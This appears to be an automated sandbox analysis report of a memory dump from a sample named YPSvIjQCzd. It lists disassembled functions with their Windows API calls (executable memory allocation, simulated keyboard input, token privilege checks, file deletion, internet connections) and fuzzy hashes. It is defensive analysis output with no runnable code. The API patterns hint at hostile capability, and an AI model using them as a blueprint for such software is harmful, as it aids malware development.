Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
Instruction ID: 9c0abc5190a088a87d6ea810232f66ad4e515000f8e4b7952b4b2caf175f2737
Opcode Fuzzy Hash: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
Instruction Fuzzy Hash: 2CC15E75A0422AEFCB14CF95D884EAEBBF5FF48714B118599E806EB251D730DD81CB90

Function 0084E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0084E3D2
CharLowerBuffW.USER32(?,?), ref: 0084E415

Part of subcall function 0084DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0084E615
_memmove.LIBCMT ref: 0084E628

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 85556c3acdb386a66e31b42f2ebb304ac9a7f6c8dda2805da6e54827886681c5
Instruction ID: 090cd19524694c611c2a092598ba12deffe04e2c858858eafbb3e74079b0fc85
Opcode Fuzzy Hash: 85556c3acdb386a66e31b42f2ebb304ac9a7f6c8dda2805da6e54827886681c5
Instruction Fuzzy Hash: FFC146716083159FC714DF28C480A6ABBE4FF88318F14896EF999DB352D735E906CB82

Function 00826DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00826E04
SysAllocString.OLEAUT32(00000000), ref: 00826EAD
VariantCopy.OLEAUT32 ref: 00826EDC
VariantClear.OLEAUT32(?), ref: 00826F03

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: c102c54bc951c693dbabf12319ff0749d79b1431dfb52290f547b8c6814c1f1f
Instruction ID: fa0494ee080df58bd57b6ddbc7e3a5165e715915e649ea200ba109891fa343a2
Opcode Fuzzy Hash: c102c54bc951c693dbabf12319ff0749d79b1431dfb52290f547b8c6814c1f1f
Instruction Fuzzy Hash: 4351C730604715DBDB30AF6AF895A2AB3E5FF48310F20881FE656CB291EF7498D49B15

Function 00859A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0163E410,?), ref: 00859AD2
ScreenToClient.USER32(00000002,00000002), ref: 00859B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00859B72

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 1de5436c8a20100b2afd17653d6b0ce7deacaa29994291414cee232662072f00
Instruction ID: ec74f6397d3d6ecf382880239266a7eb475ec6349a4fdd3f59a07aa9e17f0f3f
Opcode Fuzzy Hash: 1de5436c8a20100b2afd17653d6b0ce7deacaa29994291414cee232662072f00
Instruction Fuzzy Hash: 80516A34A00219EFDF10DF68D880AAE7BB6FB54361F14826AFC55DB290D730AD45CB91

Function 0083BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0083BB09
GetLastError.KERNEL32(?,00000000), ref: 0083BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0083BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0083BB80

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 99f04bb447f87a5c3ae063b9ed4e75752911588607176d9802782aaa30498a8c
Instruction ID: 57eddadfb84ad41ffff3568a10202a119c15e5e676904b2768bee16770795faf
Opcode Fuzzy Hash: 99f04bb447f87a5c3ae063b9ed4e75752911588607176d9802782aaa30498a8c
Instruction Fuzzy Hash: 6441F839200610DFCB10AF15C598A59BBF5FF89310F099499FA4A9B362CB38FD01CB91

Function 00858AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00858B4D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 7228e989d73040dec87bee8b2fb7a0aa7794fb9b22a07ef6204e1b04f5fd99d8
Instruction ID: 033dbc920921435f818c480c68889bda529762e8f41f1ae7e6ec90f2e066df62
Opcode Fuzzy Hash: 7228e989d73040dec87bee8b2fb7a0aa7794fb9b22a07ef6204e1b04f5fd99d8
Instruction Fuzzy Hash: 9031C374600218FFEF209A18CC45FA937A9FB05363F244613FE51F62A1DE30A9588A43

Function 0085ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0085AE1A
GetWindowRect.USER32(?,?), ref: 0085AE90
PtInRect.USER32(?,?,0085C304), ref: 0085AEA0
MessageBeep.USER32(00000000), ref: 0085AF11

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e37251d539136e9255c9acf371918b2085e6913c3e05c19df8f15bab0a1e9670
Instruction ID: 568fc87d5ea32f2ef8ee2048b15455c031d0e49fd27d30b9df39e01579140df8
Opcode Fuzzy Hash: e37251d539136e9255c9acf371918b2085e6913c3e05c19df8f15bab0a1e9670
Instruction Fuzzy Hash: 0541BE70600209DFCB19DF58D8C5B69BBF5FF49342F1882A9E815EB251D730A909CF92

Function 00830FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00831037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00831053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008310B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0083110B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
Instruction ID: b7451e8beea67246911542fca52ca0904044248081a1b11415940c975d659cbe
Opcode Fuzzy Hash: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
Instruction Fuzzy Hash: B9311830A40A88AAEF388A698C1D7F9BBA9FBC4B10F04421AE580D61D1C77489D097D1

Function 00831121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00831176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00831192
PostMessageW.USER32(00000000,00000101,00000000), ref: 008311F1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00831243

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
Instruction ID: 7c8861175e1ce9650f7f299c7e9ef04c2adbf5daa46d74060e5aee95af20a636
Opcode Fuzzy Hash: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
Instruction Fuzzy Hash: 51310730A4070C5AEF20CA69881D7FEBBAAFBC9710F04535BE680D21D1C378495597E5

Function 00806415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0080644B
__isleadbyte_l.LIBCMT ref: 00806479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008064A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008064DD

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a57be696efdaa925c96110ff90cc0ef73f6f274bde486d70c070dcd0fd3912ee
Instruction ID: b3d0fa7766651556520b06bae235bd055fb04ffb78658e61d8af87101118c9a2
Opcode Fuzzy Hash: a57be696efdaa925c96110ff90cc0ef73f6f274bde486d70c070dcd0fd3912ee
Instruction Fuzzy Hash: 5831BE31600A5AEFDB618F65CC85BBA7BA5FF41320F154029E864C71E1EB35D8B0DB94

Function 00855175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00855189

Part of subcall function 0083387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00833897
Part of subcall function 0083387D: GetCurrentThreadId.KERNEL32 ref: 0083389E
Part of subcall function 0083387D: AttachThreadInput.USER32(00000000,?,008352A7), ref: 008338A5

GetCaretPos.USER32(?), ref: 0085519A
ClientToScreen.USER32(00000000,?), ref: 008551D5
GetForegroundWindow.USER32 ref: 008551DB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 175393fca1efd28e3c6288f37860fa5a64dadc205b958f615ed4f5c536091e36
Instruction ID: 5aa66aa33c459ec1b415e6db5daed9f4c44a4981da4b4c66bea1270947f7842e
Opcode Fuzzy Hash: 175393fca1efd28e3c6288f37860fa5a64dadc205b958f615ed4f5c536091e36
Instruction Fuzzy Hash: 0E311072900118AFDB00EFA5C885AEFB7FDFF98304F10806AE515E7241EA759E45CBA1

Function 00828B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00828652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828669
Part of subcall function 00828652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00828673
Part of subcall function 00828652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00828682
Part of subcall function 00828652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00828689
Part of subcall function 00828652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0082869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00828BEB
_memcmp.LIBCMT ref: 00828C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00828C44
HeapFree.KERNEL32(00000000), ref: 00828C4B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 2182266621-0
Opcode ID: b3e08d0ac7b547867a551fbd76511ba407e418c8827f018c7b28fdc19d47f991
Instruction ID: 5ba19b835cccd2f40f2d939c68565584ac0ae36b8e642312771708bb1156e8ac
Opcode Fuzzy Hash: b3e08d0ac7b547867a551fbd76511ba407e418c8827f018c7b28fdc19d47f991
Instruction Fuzzy Hash: 94218971E42218EBDF00DFA4D948BAEB7B8FF40355F144099E554E7241DB34AA86DB60

Function 007F0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 007F0BF2

Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837B20,?,?,00000000), ref: 007D5B8C
Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837B20,?,?,00000000,?,?), ref: 007D5BB0

_fprintf.LIBCMT ref: 007F0C29
OutputDebugStringW.KERNEL32(?), ref: 00826331

Part of subcall function 007F4CDA: _flsall.LIBCMT ref: 007F4CF3

__setmode.LIBCMT ref: 007F0C5E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: dfc994014d436c472fd755e7d5f47279c2319e40861e6a5aab6572baaca472ff
Instruction ID: b08ecf5553a838d0d47f67fa24f6bd7c4f22cc0beca256512713f668bdb76ae5
Opcode Fuzzy Hash: dfc994014d436c472fd755e7d5f47279c2319e40861e6a5aab6572baaca472ff
Instruction Fuzzy Hash: BF110532904208FBCB04B3B4AC4A9BE7B79EF81320F14011AF30497392EE681D9193E1

Function 00841A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00841A97

Part of subcall function 00841B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00841B40
Part of subcall function 00841B21: InternetCloseHandle.WININET(00000000), ref: 00841BDD

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
Instruction ID: 53c7258d13f8b813715e19005d4427bf9bd2b450acd5c68baa05b40032a08fe9
Opcode Fuzzy Hash: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
Instruction Fuzzy Hash: F621DE31200708BFEB129F60CC09FBABBADFF88711F10001AFA51D6651EB31E8509BA0

Function 0082E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0082E1C4,?,?,?,0082EFB7,00000000,000000EF,00000119,?,?), ref: 0082F5BC
Part of subcall function 0082F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0082F5E2
Part of subcall function 0082F5AD: lstrcmpiW.KERNEL32(00000000,?,0082E1C4,?,?,?,0082EFB7,00000000,000000EF,00000119,?,?), ref: 0082F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0082EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0082E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 0082E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0082EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0082E237

Strings

cdecl, xrefs: 0082E22E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 521c665559b17e9ec0498fe0c2798ad424b6137e58b4c79eb9dc68c541426972
Instruction ID: 3830cefa0b394bbe34150c734e7af1cf665a64194a787979c78bc7e9c5c45801
Opcode Fuzzy Hash: 521c665559b17e9ec0498fe0c2798ad424b6137e58b4c79eb9dc68c541426972
Instruction Fuzzy Hash: 6111D036200315EFCB25AF74EC49D7A77B8FF84350B40402AF916CB2A1EB719890C7A4

Function 00805332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00805351

Part of subcall function 007F594C: __FF_MSGBANNER.LIBCMT ref: 007F5963
Part of subcall function 007F594C: __NMSG_WRITE.LIBCMT ref: 007F596A
Part of subcall function 007F594C: RtlAllocateHeap.NTDLL(01620000,00000000,00000001), ref: 007F598F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
